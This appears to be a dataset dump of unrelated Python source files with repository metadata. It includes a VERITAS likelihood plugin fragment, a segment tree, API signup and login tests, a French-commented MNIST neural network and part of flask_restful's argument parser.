# decent models. It might fail for models with too sharp features, smaller
# than the size of the monte carlo interval.
def integral(e1, e2):
# Simpson's rule
return (e2 - e1) / 6.0 * (differential_flux(e1)
+ 4 * differential_flux((e1 + e2) / 2.0)
+ differential_flux(e2))
return differential_flux, integral
@staticmethod
def _simulated_spectrum(x):
return (x)**(-2.45)
@staticmethod
def _simulated_spectrum_f(e1, e2):
integral_f = lambda x: -3.0 / (x**0.5)
return integral_f(e2) - integral_f(e1)
@staticmethod
def _integrate(function, e1, e2):
integrals = []
for ee1, ee2 in zip(e1,e2):
grid = np.linspace(ee1, ee2, 30)
integrals.append(scipy.integrate.simps(function(grid), grid))
# integrals = map(lambda x:scipy.integrate.quad(function, x[0], x[1], epsrel=1e-2)[0], zip(e1, e2))
return np.array(integrals)
def get_log_like(self, like_model, fast=True):
# Reweight the response matrix
diff_flux, integral = self._get_diff_flux_and_integral(like_model)
e1 = 10**self._log_mc_energies[:-1]
e2 = 10**self._log_mc_energies[1:]
dE = (e2 - e1)
if not fast:
print 'Udara Debug not fast********'
this_spectrum = self._integrate(diff_flux, e1, e2) / dE # 1 / keV cm2 s
sim_spectrum = self._simulated_spectrum_f(e1, e2) / dE # 1 / keV cm2 s
else:
# print 'Udara Fast ***********************'
this_spectrum = diff_flux(self._mc_energies_c)
sim_spectrum = self._simulated_spectrum(self._mc_energies_c)
weight = this_spectrum / sim_spectrum # type: np.ndarray
# print("Sum of weight: %s" % np.sum(weight))
n_pred = np.zeros(self._n_chan)
for i in range(n_pred.shape[0]):
n_pred[i] = np.sum(self._hMigration[i, :] * weight) * self._exposure
log_like, _ = poisson_observed_poisson_background(self._counts, self._bkg_counts, self._bkg_renorm,
n_pred)
log_like_tot = np.sum(log_like[self._first_chan: self._last_chan + 1]) # type: float
return log_like_tot, locals()
class VERITASLike(PluginPrototype):
def __init__(self, name, veritas_root_data):
# Open file
f = ROOT.TFile(veritas_root_data)
try:
# Loop over the runs
keys = get_list_of_keys(f)
finally:
f.Close()
# Get the names of all runs included
run_names = filter(lambda x: x.find("run") == 0, keys)
self._runs_like = collections.OrderedDict()
for run_name in run_names:
# Build the VERITASRun class
this_run = VERITASRun(veritas_root_data, run_name)
this_run.display()
if this_run.total_counts == 0 or this_run.total_background_counts == 0:
custom_warnings.warn("%s has 0 source or bkg counts, cannot use it." % run_name)
continue
else:
# Get background spectrum and observation spectrum (with response)
# this_observation = this_run.get_spectrum()
# this_background = this_run.get_background_spectrum()
#
# self._runs_like[run_name] = DispersionSpectrumLike(run_name,
# this_observation,
# this_background)
#
# self._runs_like[run_name].set_active_measurements("c50-c130")
self._runs_like[run_name] = this_run
super(VERITASLike, self).__init__(name, {})
def rebin_on_background(self, *args, **kwargs):
for run in self._runs_like.values():
run.rebin_on_background(*args, **kwargs)
def rebin_on_source(self, *args, **kwargs):
for run in self._runs_like.values():
run.rebin_on_source(*args, **kwargs)
def set_model(self, likelihood_model_instance):
"""
Set the model to be used in the joint minimization. Must be a LikelihoodModel instance.
"""
# Set the model for all runs
self._likelihood_model = likelihood_model_instance # type: astromodels.Model
# for run in self._runs_like.values():
#
# run.set_model(likelihood_model_instance)
def get_log_like(self):
"""
Return the value of the log-likelihood with the current values for the
parameters
"""
# Collect the likelihood from each run
total = 0
total_sat = 0
for run in self._runs_like.values():
total += run.get_log_like(self._likelihood_model)[0]
return total
def inner_fit(self):
"""
This is used for the profile likelihood. Keeping fixed all parameters in the
LikelihoodModel, this method minimize the logLike over the remaining nuisance
parameters, i.e., the parameters belonging only to the model for this
particular detector. If there are no nuisance parameters, simply return the
logLike value.
"""
return self.get_log_like()
| [
"fkt8356@gmail.com"
] | fkt8356@gmail.com |
2eff427266939ed01872e9d20210444fb49759ed | 7966fa31437cc8a539621a5a0642ce24c1c9de50 | /PycharmProjects/segmentTree/sgrTree.py | 29d3a3b49750c8b91cbbe7e14c980ac9783aa1fe | [] | no_license | crystal30/DataStructure | 4f938508f4c60af9c5f8ec5520d5acedbe2dc90e | c55b0cfd2967a2221c27ed738e8de15034775945 | refs/heads/master | 2021-06-25T17:49:03.048853 | 2021-01-22T00:37:04 | 2021-01-22T00:37:04 | 192,374,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,804 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
class SegTree():
def __init__(self, data):
self.__data = data
self.__tree = [None]*len(data)*4
def getSize(self):
return len(self.__data)
def getIndex(self, index):
return self.getIndex(index)
# 左孩子节点
def __leftChild(self, index):
return index*2 + 1
# 右孩子节点
def __rightChild(self, index):
return index*2 + 2
#融合函数,这里 返回 两个list 相加
def merger(self, a,b):
return a+b
def tree(self):
self.__subTree(0,l=0, r = len(self.__data)-1)
def __subTree(self,index,l, r):
if l==r:
# self.__tree[index] = [self.__data[l]]
self.__tree[index] = self.__data[l]
return
else: # l<r
mid = (r+l) // 2
lChild = self.__leftChild(index)
rChild = self.__rightChild(index)
self.__subTree(lChild, l,mid)
self.__subTree(rChild, mid+1,r)
self.__tree[index] = self.merger(self.__tree[lChild], self.__tree[rChild])
#查询
def query(self,ql, qr):
return self.__query(0, 0, len(self.__data)-1, ql, qr)
def __query(self,treeIndex, l, r, ql, qr):
if l==ql and r == qr:
return self.__tree[treeIndex]
leftChild = self.__leftChild(treeIndex)
rightChild = self.__rightChild(treeIndex)
mid = (l+r) // 2
if qr <= mid:
return self.__query(leftChild, l, mid, ql, qr)
elif ql >= mid+1:
return self.__query(rightChild, mid+1, r, ql, qr)
if ql <= mid and qr > mid:
leftRe = self.__query(leftChild,l,mid,ql, mid)
rightRe = self.__query(rightChild, mid+1, r, mid+1, qr)
return self.merger(leftRe , rightRe)
#更新
def set(self,index,e):
self.__data[index] = e
self.__set(0, 0, len(self.__data)-1, index,e)
def __set(self,treeIndex, l, r, index ,e):
if l == r:
# self.__tree[treeIndex] = [e]
self.__tree[treeIndex] = e
# self.__tree[treeIndex] = [self.__data[l]]
return
mid = l + (r-l)//2
leftChild = self.__leftChild(treeIndex)
rightChild = self.__rightChild(treeIndex)
if index <= mid:
self.__set(leftChild,l,mid,index,e)
elif index >= mid+1:
self.__set(rightChild, mid+1, r, index, e)
self.__tree[treeIndex] = self.merger(self.__tree[leftChild], self.__tree[rightChild])
def __str__(self):
return str(self.__tree)
if __name__ == "__main__":
nums = [-2, 0, 3, -5, 2, -1]
seg = SegTree(nums)
seg.tree()
print(seg)
print(seg.query(2,3))
seg.set(2,5)
print(seg)
| [
"zhao_crystal@126.com"
] | zhao_crystal@126.com |
1aa628a816a9342365917b9540992c27ccc13114 | 69117983b1ca2b8dfd36050ac741b1b7dbc878fb | /TestCase/test_zuoye_zhuce.py | 68dd085c05d79adfca005476e45371d8ced9b5ac | [] | no_license | nigang123/api_auto_test | d7bbf62226e9d22baabe387c48f7093f047bebca | 3685a84f5b270945e54e97420f4db97b52bead9a | refs/heads/master | 2022-12-14T14:50:20.146989 | 2019-05-24T03:13:48 | 2019-05-24T03:13:48 | 183,154,902 | 0 | 0 | null | 2022-07-06T20:05:29 | 2019-04-24T05:33:36 | Python | UTF-8 | Python | false | false | 2,411 | py | from Common import Request, Assert, Tools
import allure
import pytest
phone = Tools.phone_num()
pwd = Tools.random_str_abc(2)+Tools.random_123(4)
rePwd = pwd
userName = Tools.random_str_abc(3)+Tools.random_123(2)
newPwd = pwd+Tools.random_123(1)
oldPwd = pwd
reNewPwd =newPwd
head = {}
request = Request.Request()
assertion = Assert.Assertions()
url = 'http://192.168.1.137:1811/'
@allure.feature("注册模块")
class Test_zhuce:
@allure.story("注册测试")
def test_zhuce(self):
req_json = {"phone": phone, 'pwd': pwd, "rePwd":rePwd, "userName": userName,}
zhuce_resp = request.post_request(url=url + 'user/signup', json=req_json)
resp_json = zhuce_resp.json()
assertion.assert_code(zhuce_resp.status_code, 200)
assertion.assert_in_text(resp_json['respBase'],'成功')
@allure.story("冻结用户")
def test_dongjie(self):
dongjie_resp = request.post_request(url=url + '/user/lock', params={'userName':userName},
headers= {'Content-Type':'application/x-www-form-urlencoded'})
resp_dict = dongjie_resp.json()
assertion.assert_code(dongjie_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
@allure.story("解冻用户")
def test_jiedong(self):
jiedong_resp = request.post_request(url=url + '/user/unLock', params={'userName': userName},
headers={'Content-Type': 'application/x-www-form-urlencoded'})
resp_dict = jiedong_resp.json()
assertion.assert_code(jiedong_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
@allure.story("登录")
def test_login(self):
login_resp = request.post_request(url=url + 'user/login', json={"pwd":pwd,"userName":userName})
resp_dict = login_resp.json()
assertion.assert_code(login_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
@allure.story("修改密码")
def test_xiugai(self):
xiugai_resp = request.post_request(url=url + '/user/changepwd', json={"newPwd": newPwd, "oldPwd": oldPwd,'reNewPwd':reNewPwd,'userName':userName})
resp_dict = xiugai_resp.json()
assertion.assert_code(xiugai_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
| [
"494578387@qq.com"
] | 494578387@qq.com |
fcbbdb5459685ee330bb844f8b43925ca46fd802 | 65ca852688354783630f1595853222f8ecc4668a | /RNASoftmaxTest.py | d7b2b6785060aa0b312dd58d9b37cc2b6c45fb9a | [] | no_license | RobertGodin/CodePython | f15190df24b6da9f53002aeb791b63ebe2996275 | fb051d2b627cf43d55944b5f09626eb618de7411 | refs/heads/master | 2023-02-07T06:45:45.007762 | 2023-02-04T15:54:59 | 2023-02-04T15:54:59 | 133,089,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,691 | py | # -*- coding: utf-8 -*-
# Implémentation d'un RNA par couche
# Deux types de couches : dense linéaire et activation
# Division des données en deux groupes : entrainement et test
# Exemple avec MNIST
import numpy as np
np.random.seed(42) # pour reproduire les mêmes résultats
import random
random.seed(42)
import matplotlib.pyplot as plt
import matplotlib as mpl
class Couche:
""" Classe abstraite qui représente une couche du RNA
X: np.array 2D de taille (1,n), entrée de la couche
Y: np.array 2D de taille (1,m), sortie de la couche
"""
def propager_une_couche(self,X):
""" Calculer la sortie Y pour une valeur de X
X : vecteur des variables prédictives
Les valeurs de X et Y sont stockées pour les autres traitements.
"""
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Calculer les dérivées par rapport à X et les autres paramètres à partir de dJ_dY
et mettre à jour les paramètres de la couche selon le taux spécifié.
dJ_dY : np.array(1,m), dérivées de J par rapport à la sortie Y
taux : float, le taux dans la descente de gradiant
retourne la dérivée de J par rapport à X
"""
class CoucheDenseLineaire(Couche):
""" Couche linéaire dense. Y=WX+B
"""
def __init__(self,n,m,init_W=None,init_B=None):
""" Initilalise les paramètres de la couche. W et B sont initialisés avec init_W et init_B lorsque spécifiés.
Sinon, des valeurs aléatoires sont générés pour W une distribution normale et B est initialisée avec des 0
si les paramètres init_W et init_B ne sont pas spécifiés.
L'initialization He est employée pour W
n : int, taille du vecteur d'entrée X
m : int, taille du vecteur de sortie Y
init_W : np.array, shape(n,m), valeur initiale optionnelle de W
init_B : np.array, shape(1,m), valeur initial optionnelle de B
"""
if init_W is None :
# Initialization He
self.W = np.random.randn(n,m) * np.sqrt(2/n)
else:
self.W = init_W
if init_B is None :
self.B = np.zeros((1,m))
else:
self.B = init_B
def propager_une_couche(self,X):
""" Fait la propagation de X et retourne Y=WX+B.
"""
self.X = X
self.Y = self.B + np.dot(self.X,self.W)
return self.Y
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Calculer les dérivées dJ_dW,dJ_dB,dJ_dX pour une couche dense linéaire et
mettre à jour les paramètres selon le taux spécifié
dJ_dY : np.array(1,2), dérivées de J par rapport à la sortie Y
taux : float, le taux dans la descente de gradiant
retourne la dérivée de J par rapport à X
"""
dJ_dW = np.dot(self.X.T,dJ_dY)
dJ_dB = dJ_dY
dJ_dX = np.dot(dJ_dY,self.W.T)
if trace:
print("dJ_dW:",dJ_dW)
print("dJ_dB:",dJ_dB)
print("dJ_dX:",dJ_dX)
# Metre à jour les paramètres W et B
self.W -= taux * dJ_dW
self.B -= taux * dJ_dB
if trace:
print("W modifié:",self.W)
print("B modifié:",self.B)
return dJ_dX
class CoucheActivation(Couche):
""" Couche d'activation selon une fonction spécifiée dans le constructeur
"""
def __init__(self,fonction_activation,derivee):
""" Initialise la fonction_activation ainsi que la dérivée
fonction_activation: une fonction qui prend chacune des valeurs de X et
retourne Y=fonction_activation(X)
derivee: une fonction qui calcule la dérivée la fonction_activation
"""
self.fonction_activation = fonction_activation
self.derivee = derivee
def propager_une_couche(self,X):
""" Retourne Y=fonction_activation(X)
"""
self.X = X
self.Y = self.fonction_activation(self.X)
return self.Y
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Retourne la dérivée de la fonction d'activation par rapport l'entrée X
Le taux n'est pas utilisé parce qu'il n'y a pas de paramètres à modifier dans ce genre de couche
"""
return self.derivee(self.X) * dJ_dY
class CoucheSoftmax(Couche):
""" Couche d'activation softmax
"""
def __init__(self,n):
"""
n: nombre d'entrées et de sorties
"""
self.n = n
def propager_une_couche(self,X):
""" Calcule les activations softmax pour chacunes de entrées xi
"""
self.X = X
X_decale = X-np.max(X) # Pour la stabilité numérique, les valeurs sont décalées de max(X)
exponentielles = np.exp(X_decale)
self.Y = exponentielles / np.sum(exponentielles)
return self.Y
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Retourne la dérivée de la fonction d'activation par rapport l'entrée X
Le taux n'est pas utilisé parce qu'il n'y a pas de paramètres à modifier dans ce genre de couche
"""
return np.dot(dJ_dY,self.Y.T*(np.identity(self.n)-self.Y))
def delta_kroneker(i,j):
if i==j :
return 1
else:
return 0
def erreur_quadratique(y_prediction,y):
""" Retourne l'erreur quadratique entre la prédiction y_prediction et la valeur attendue y
"""
return np.sum(np.power(y_prediction-y,2))
def d_erreur_quadratique(y_prediction,y):
return 2*(y_prediction-y)
def entropie_croisee(y_prediction,y):
""" Retourne l'entropie croisée entre la prédiction y_prediction et la valeur attendue y
"""
return -np.sum(y*np.log(y_prediction))
def d_entropie_croisee(y_prediction,y):
return -(y/y_prediction)
class ReseauMultiCouches:
""" Réseau mutli-couche formé par une séquence de Couches
couches : liste de Couches du RNA
cout : fonction qui calcule de cout J
derivee_cout: dérivée de la fonction de cout
"""
def __init__(self):
self.couches = []
self.cout = None
self.derivee_cout = None
def ajouter_couche(self,couche):
self.couches.append(couche)
def specifier_J(self,cout,derivee_cout):
""" Spécifier la fonction de coût J et sa dérivée
"""
self.cout = cout
self.derivee_cout = derivee_cout
def propagation_donnees_X(self,donnees_X,trace=False):
""" Prédire Y pour chacune des observations dans donnees_X)
donnees_X : np.array 3D des valeurs de X pour chacune des observations
chacun des X est un np.array 2D de taille (1,n)
"""
nb_observations = len(donnees_X)
predictions_Y = []
for indice_observation in range(nb_observations):
# XY_propage : contient la valeur de X de la couche courante qui correspond
# à la valeur de Y de la couche précédente
XY_propage = donnees_X[indice_observation]
if trace:
print("Valeur de X initiale:",XY_propage)
for couche in self.couches:
XY_propage = couche.propager_une_couche(XY_propage)
if trace:
print("Valeur de Y après propagation pour la couche:",XY_propage)
predictions_Y.append(XY_propage)
return predictions_Y
def metriques(self, donnees_X,donnees_Y):
"""Retourne le cout moyen, la proportion de bons résultats
Choisit l'indice de la classe dont l'activation est la plus grande"""
erreur_quadratique = 0
nb_correct = 0
predictions_Y=self.propagation_donnees_X(donnees_X)
for indice in range(len(donnees_Y)):
erreur_quadratique += self.cout(predictions_Y[indice],donnees_Y[indice])
classe_predite = np.argmax(predictions_Y[indice])
if donnees_Y[indice][0,classe_predite] == 1:
nb_correct+=1
return (erreur_quadratique/len(donnees_Y),nb_correct/len(donnees_Y))
def entrainer_descente_gradiant_stochastique(self,donnees_ent_X,donnees_ent_Y,donnees_test_X,donnees_test_Y,
nb_epochs,taux,trace=False,graph_cout=False):
""" Entrainer le réseau par descente de gradiant stochastique (une observation à la fois)
donnees_ent_X : np.array 3D des valeurs de X pour chacune des observations d'entrainement
chacun des X est un np.array 2D de taille (1,n)
donnees_ent_Y : np.array 3D des valeurs de Y pour chacune des observations d'entrainement
chacun des Y est un np.array 2D de taille (1,m)
donnees_test_X : np.array 3D des valeurs de X pour chacune des observations de test
chacun des X est un np.array 2D de taille (1,n)
donnees_test_Y : np.array 3D des valeurs de Y pour chacune des observations de test
chacun des Y est un np.array 2D de taille (1,m)
nb_epochs : nombre de cycle de passage sur les données d'entainement
taux : taux dans la descente de gradiant
trace : Boolean, True pour afficher une trace des calculs effectués sur les paramètres
graph_cout : Boolean, True pur afficher un graphique de l'évolution du coût
"""
nb_observations = len(donnees_ent_X)
if graph_cout :
liste_cout_moyen_ent = []
liste_ok_ent = []
liste_cout_moyen_test = []
liste_ok_test = []
# Boucle d'entrainement principale, nb_epochs fois
for cycle in range(nb_epochs):
cout_total = 0
# Descente de gradiant stochastique, une observation à la fois
for indice_observation in range(nb_observations):
# Propagation avant pour une observation X
# XY_propage : contient la valeur de X de la couche courante qui correspond
# à la valeur de Y de la couche précédente
XY_propage = donnees_ent_X[indice_observation]
if trace:
print("Valeur de X initiale:",XY_propage)
for couche in self.couches:
XY_propage = couche.propager_une_couche(XY_propage)
if trace:
print("Valeur de Y après propagation pour la couche:",XY_propage)
# Calcul du coût pour une observation
cout_total += self.cout(XY_propage,donnees_ent_Y[indice_observation])
# Rétropropagation pour une observation
# dJ_dX_dJ_dY représente la valeur de la dérivée dJ_dX de la couche suivante
# qui correspond à dJ_dY de la couche en cours de traitement
dJ_dX_dJ_dY = self.derivee_cout(XY_propage,donnees_ent_Y[indice_observation])
if trace :
print("dJ_dY pour la couche finale:",dJ_dX_dJ_dY)
for couche in reversed(self.couches):
dJ_dX_dJ_dY = couche.retropropager_une_couche(dJ_dX_dJ_dY,taux,trace)
# Calculer et afficher le coût moyen pour une epoch
cout_moyen = cout_total/nb_observations
if graph_cout:
print(f'-------- > epoch {cycle+1}: coût moyen {cout_moyen}')
cout_ent,ok_ent = self.metriques(donnees_ent_X,donnees_ent_Y)
cout_test,ok_test = self.metriques(donnees_test_X,donnees_test_Y)
liste_cout_moyen_ent.append(cout_ent)
liste_ok_ent.append(ok_ent)
liste_cout_moyen_test.append(cout_test)
liste_ok_test.append(ok_test)
# Affichage du graphique d'évolution de l'erreur quadratique
if graph_cout:
plt.plot(np.arange(0,nb_epochs),liste_cout_moyen_ent,label='Erreur entraînement')
plt.plot(np.arange(0,nb_epochs),liste_cout_moyen_test,label='Erreur test')
plt.title("Evolution du coût")
plt.xlabel('epoch')
plt.ylabel('moyenne par observation')
plt.legend(loc='upper center')
plt.show()
plt.plot(np.arange(0,nb_epochs),liste_ok_ent,label='entraînement')
plt.plot(np.arange(0,nb_epochs),liste_ok_test,label='test')
plt.title("Evolution du taux de bonnes prédictions")
plt.xlabel('epoch')
plt.ylabel('moyenne par observation')
plt.legend(loc='upper center')
plt.show()
def tanh(x):
return np.tanh(x)
def derivee_tanh(x):
return 1-np.tanh(x)**2
def sigmoide(x):
return 1.0/(1.0+np.exp(-x))
def derivee_sigmoide(x):
return sigmoide(x)*(1-sigmoide(x))
def relu(x):
return np.maximum(x,0)
def derivee_relu(x):
return np.heaviside(x,1)
def bitmap(classe):
""" Representer l'entier de classe par un vecteur bitmap (10,1)
classe : entier (entre 0 et 9 qui représente la classe de l'observation"""
e = np.zeros((1,10))
e[0,classe] = 1.0
return e
# Chargement des données de MNIST
import pickle, gzip
fichier_donnees = gzip.open(r"mnist.pkl.gz", 'rb')
donnees_ent, donnees_validation, donnees_test = pickle.load(fichier_donnees, encoding='latin1')
fichier_donnees.close()
donnees_ent_X = donnees_ent[0].reshape((50000,1,784))
donnees_ent_Y = [bitmap(y) for y in donnees_ent[1]] # Encodgae bitmap de l'entier (one hot encoding)
donnees_test_X = donnees_test[0].reshape((10000,1,784))
donnees_test_Y = [bitmap(y) for y in donnees_test[1]] # Encodgae bitmap de l'entier (one hot encoding)
# Définir l'architecture du RNA
# Deux couches denses linéaires suivies chacune d'une couche d'activation sigmoide
un_RNA = ReseauMultiCouches()
un_RNA.specifier_J(entropie_croisee,d_entropie_croisee)
un_RNA.ajouter_couche(CoucheDenseLineaire(784,30))
un_RNA.ajouter_couche(CoucheActivation(relu,derivee_relu))
un_RNA.ajouter_couche(CoucheDenseLineaire(30,10))
un_RNA.ajouter_couche(CoucheSoftmax(10))
# Entrainer le RNA
un_RNA.entrainer_descente_gradiant_stochastique(donnees_ent_X,donnees_ent_Y,donnees_test_X,donnees_test_Y,
nb_epochs=30,taux=0.003,trace = False, graph_cout = True)
for i in range(3):
print("Classe de l'image",i,":",donnees_ent_Y[i])
print("Prédiction softmax:",un_RNA.propagation_donnees_X(donnees_ent_X[i]))
image_applatie = donnees_ent_X[i]
une_image = image_applatie.reshape(28, 28)
plt.imshow(une_image, cmap = mpl.cm.binary, interpolation="nearest")
plt.axis("off")
plt.show() | [
"godin.robert@uqam.ca"
] | godin.robert@uqam.ca |
b67f54c5743329b00db5cb95eb989785b1753334 | bfd196c62c8a4f0fa313960de3fcebff16491968 | /__init__.py | 983e326389960710d3a4748532a98881362d80cd | [] | no_license | humanytek-team/acc_customer_destiny_location | c8ba702f9f834c070afc5f1da57c71aea9a55aed | 6b4e795d7255f05197f924cc883e1aadbcc668d6 | refs/heads/master | 2021-05-07T21:28:17.701505 | 2017-10-31T15:16:35 | 2017-10-31T15:16:35 | 109,013,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | #import sale_order
import account_invoice
import client_warehouse | [
"s.mtz.casillas@gmail.com"
] | s.mtz.casillas@gmail.com |
f849478cc7761ac222d66b2215c09ce091a114d9 | 6a0a634265957e9dcd26bc80e3304e107fb004d0 | /venvflask/lib/python3.7/site-packages/flask_restful/reqparse.py | 7c33f143a5e14cbfd098613fad892829efa31f54 | [] | no_license | ogutiann/PythonEthereumSmartContracts | 8bd81aa14eab567d41b5dad74b67aba92a405ebd | d870e9fd1c7f68b8493db4c2b2af224f966d8e51 | refs/heads/master | 2023-01-04T14:23:12.396898 | 2020-10-29T12:12:46 | 2020-10-29T12:12:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,660 | py | from copy import deepcopy
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
from flask import current_app, request
from werkzeug.datastructures import MultiDict, FileStorage
from werkzeug import exceptions
import flask_restful
import decimal
import six
class Namespace(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self[name] = value
_friendly_location = {
u'json': u'the JSON body',
u'form': u'the post body',
u'args': u'the query string',
u'values': u'the post body or the query string',
u'headers': u'the HTTP headers',
u'cookies': u'the request\'s cookies',
u'files': u'an uploaded file',
}
text_type = lambda x: six.text_type(x)
class Argument(object):
"""
:param name: Either a name or a list of option strings, e.g. foo or
-f, --foo.
:param default: The value produced if the argument is absent from the
request.
:param dest: The name of the attribute to be added to the object
returned by :meth:`~reqparse.RequestParser.parse_args()`.
:param bool required: Whether or not the argument may be omitted (optionals
only).
:param action: The basic type of action to be taken when this argument
is encountered in the request. Valid options are "store" and "append".
:param ignore: Whether to ignore cases where the argument fails type
conversion
:param type: The type to which the request argument should be
converted. If a type raises an exception, the message in the
error will be returned in the response. Defaults to :class:`unicode`
in python2 and :class:`str` in python3.
:param location: The attributes of the :class:`flask.Request` object
to source the arguments from (ex: headers, args, etc.), can be an
iterator. The last item listed takes precedence in the result set.
:param choices: A container of the allowable values for the argument.
:param help: A brief description of the argument, returned in the
response when the argument is invalid. May optionally contain
an "{error_msg}" interpolation token, which will be replaced with
the text of the error raised by the type converter.
:param bool case_sensitive: Whether argument values in the request are
case sensitive or not (this will convert all values to lowercase)
:param bool store_missing: Whether the arguments default value should
be stored if the argument is missing from the request.
:param bool trim: If enabled, trims whitespace around the argument.
:param bool nullable: If enabled, allows null value in argument.
"""
def __init__(self, name, default=None, dest=None, required=False,
ignore=False, type=text_type, location=('json', 'values',),
choices=(), action='store', help=None, operators=('=',),
case_sensitive=True, store_missing=True, trim=False,
nullable=True):
self.name = name
self.default = default
self.dest = dest
self.required = required
self.ignore = ignore
self.location = location
self.type = type
self.choices = choices
self.action = action
self.help = help
self.case_sensitive = case_sensitive
self.operators = operators
self.store_missing = store_missing
self.trim = trim
self.nullable = nullable
def __str__(self):
if len(self.choices) > 5:
choices = self.choices[0:3]
choices.append('...')
choices.append(self.choices[-1])
else:
choices = self.choices
return 'Name: {0}, type: {1}, choices: {2}'.format(self.name, self.type, choices)
def __repr__(self):
return "{0}('{1}', default={2}, dest={3}, required={4}, ignore={5}, location={6}, " \
"type=\"{7}\", choices={8}, action='{9}', help={10}, case_sensitive={11}, " \
"operators={12}, store_missing={13}, trim={14}, nullable={15})".format(
self.__class__.__name__, self.name, self.default, self.dest, self.required, self.ignore, self.location,
self.type, self.choices, self.action, self.help, self.case_sensitive,
self.operators, self.store_missing, self.trim, self.nullable)
def source(self, request):
"""Pulls values off the request in the provided location
:param request: The flask request object to parse arguments from
"""
if isinstance(self.location, six.string_types):
value = getattr(request, self.location, MultiDict())
if callable(value):
value = value()
if value is not None:
return value
else:
values = MultiDict()
for l in self.location:
value = getattr(request, l, None)
if callable(value):
value = value()
if value is not None:
values.update(value)
return values
return MultiDict()
def convert(self, value, op):
# Don't cast None
if value is None:
if self.nullable:
return None
else:
raise ValueError('Must not be null!')
# and check if we're expecting a filestorage and haven't overridden `type`
# (required because the below instantiation isn't valid for FileStorage)
elif isinstance(value, FileStorage) and self.type == FileStorage:
return value
try:
return self.type(value, self.name, op)
except TypeError:
try:
if self.type is decimal.Decimal:
return self.type(str(value))
else:
return self.type(value, self.name)
except TypeError:
return self.type(value)
def handle_validation_error(self, error, bundle_errors):
"""Called when an error is raised while parsing. Aborts the request
with a 400 status and an error message
:param error: the error that was raised
:param bundle_errors: do not abort when first error occurs, return a
dict with the name of the argument and the error message to be
bundled
"""
error_str = six.text_type(error)
error_msg = self.help.format(error_msg=error_str) if self.help else error_str
msg = {self.name: error_msg}
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return error, msg
flask_restful.abort(400, message=msg)
def parse(self, request, bundle_errors=False):
"""Parses argument value(s) from the request, converting according to
the argument's type.
:param request: The flask request object to parse arguments from
:param bundle_errors: Do not abort when first error occurs, return a
dict with the name of the argument and the error message to be
bundled
"""
source = self.source(request)
results = []
# Sentinels
_not_found = False
_found = True
for operator in self.operators:
name = self.name + operator.replace("=", "", 1)
if name in source:
# Account for MultiDict and regular dict
if hasattr(source, "getlist"):
values = source.getlist(name)
else:
values = source.get(name)
if not (isinstance(values, MutableSequence) and self.action == 'append'):
values = [values]
for value in values:
if hasattr(value, "strip") and self.trim:
value = value.strip()
if hasattr(value, "lower") and not self.case_sensitive:
value = value.lower()
if hasattr(self.choices, "__iter__"):
self.choices = [choice.lower()
for choice in self.choices]
try:
value = self.convert(value, operator)
except Exception as error:
if self.ignore:
continue
return self.handle_validation_error(error, bundle_errors)
if self.choices and value not in self.choices:
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return self.handle_validation_error(
ValueError(u"{0} is not a valid choice".format(
value)), bundle_errors)
self.handle_validation_error(
ValueError(u"{0} is not a valid choice".format(
value)), bundle_errors)
if name in request.unparsed_arguments:
request.unparsed_arguments.pop(name)
results.append(value)
if not results and self.required:
if isinstance(self.location, six.string_types):
error_msg = u"Missing required parameter in {0}".format(
_friendly_location.get(self.location, self.location)
)
else:
friendly_locations = [_friendly_location.get(loc, loc)
for loc in self.location]
error_msg = u"Missing required parameter in {0}".format(
' or '.join(friendly_locations)
)
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return self.handle_validation_error(ValueError(error_msg), bundle_errors)
self.handle_validation_error(ValueError(error_msg), bundle_errors)
if not results:
if callable(self.default):
return self.default(), _not_found
else:
return self.default, _not_found
if self.action == 'append':
return results, _found
if self.action == 'store' or len(results) == 1:
return results[0], _found
return results, _found
class RequestParser(object):
"""Enables adding and parsing of multiple arguments in the context of a
single request. Ex::
from flask_restful import reqparse
parser = reqparse.RequestParser()
parser.add_argument('foo')
parser.add_argument('int_bar', type=int)
args = parser.parse_args()
:param bool trim: If enabled, trims whitespace on all arguments in this
parser
:param bool bundle_errors: If enabled, do not abort when first error occurs,
return a dict with the name of the argument and the error message to be
bundled and return all validation errors
"""
def __init__(self, argument_class=Argument, namespace_class=Namespace,
trim=False, bundle_errors=False):
self.args = []
self.argument_class = argument_class
self.namespace_class = namespace_class
self.trim = trim
self.bundle_errors = bundle_errors
def add_argument(self, *args, **kwargs):
"""Adds an argument to be parsed.
Accepts either a single instance of Argument or arguments to be passed
into :class:`Argument`'s constructor.
See :class:`Argument`'s constructor for documentation on the
available options.
"""
if len(args) == 1 and isinstance(args[0], self.argument_class):
self.args.append(args[0])
else:
self.args.append(self.argument_class(*args, **kwargs))
# Do not know what other argument classes are out there
if self.trim and self.argument_class is Argument:
# enable trim for appended element
self.args[-1].trim = kwargs.get('trim', self.trim)
return self
def parse_args(self, req=None, strict=False, http_error_code=400):
"""Parse all arguments from the provided request and return the results
as a Namespace
:param req: Can be used to overwrite request from Flask
:param strict: if req includes args not in parser, throw 400 BadRequest exception
:param http_error_code: use custom error code for `flask_restful.abort()`
"""
if req is None:
req = request
namespace = self.namespace_class()
# A record of arguments not yet parsed; as each is found
# among self.args, it will be popped out
req.unparsed_arguments = dict(self.argument_class('').source(req)) if strict else {}
errors = {}
for arg in self.args:
value, found = arg.parse(req, self.bundle_errors)
if isinstance(value, ValueError):
errors.update(found)
found = None
if found or arg.store_missing:
